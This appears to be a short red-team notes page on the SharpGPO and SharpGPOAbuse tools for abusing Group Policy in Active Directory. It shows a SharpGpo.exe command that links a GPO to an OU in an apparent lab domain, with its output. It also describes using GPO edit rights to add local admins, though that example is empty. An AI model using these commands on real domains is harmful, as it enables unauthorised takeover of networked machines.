SharpGPO/SharpGPOAbuse
SharpGPO and SharpGPOAbuse are both powerful tools when dealing with GPO vulnerabilities.
SharpGPO
SharpGPO is a Red Team tool written in C# that can be used to remotely manipulate Group Policy Object (GPO), Organizational Unit (OU), GPLink and Security Filtering.
In the following example, a GPO named 'Corp' is linked to another OU:
SharpGpo.exe --Action GetGPLink --GPOName CorpSharpGpo.exe --Action NewGPLink --DN "OU=Member Servers,DC=rastalabs,DC=local" --GPOName Corp
[*] Domain: rastalabs.local
[*] Domain Contorller: dc01.rastalabs.local
[*] Domain Distingushed Name: DC=rastalabs,DC=local
[*] GUID of the GPO 'Corp': {D693F1E4-5666-4259-8BF1-E43CCE1D56F9}
[*] Creating a gPLink: OU=Member Servers,DC=rastalabs,DC=local => GPO {D693F1E4-5666-4259-8BF1-E43CCE1D56F9}
[*] gPLink: [LDAP://cn={FC395C1F-E3BD-43B9-8F58-6DA55E69D3E9},cn=policies,cn=system,DC=rastalabs,DC=local;0][LDAP://cn={58F87FD9-442F-4514-99D3-45BDE620F642},cn=policies,cn=system,DC=rastalabs,DC=local;0]
[*] gPLink was successfully created
[*] gPLink after created: [LDAP://CN={D693F1E4-5666-4259-8BF1-E43CCE1D56F9},CN=Policies,CN=System,DC=rastalabs,DC=local;0][LDAP://cn={FC395C1F-E3BD-43B9-8F58-6DA55E69D3E9},cn=policies,cn=system,DC=rastalabs,DC=local;0][LDAP://cn={58F87FD9-442F-4514-99D3-45BDE620F642},cn=policies,cn=system,DC=rastalabs,DC=local;0]SharpGPOAbuse
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
In the following example a user is added to the local admin group for OUs using the GPO:
Tooling
Last updated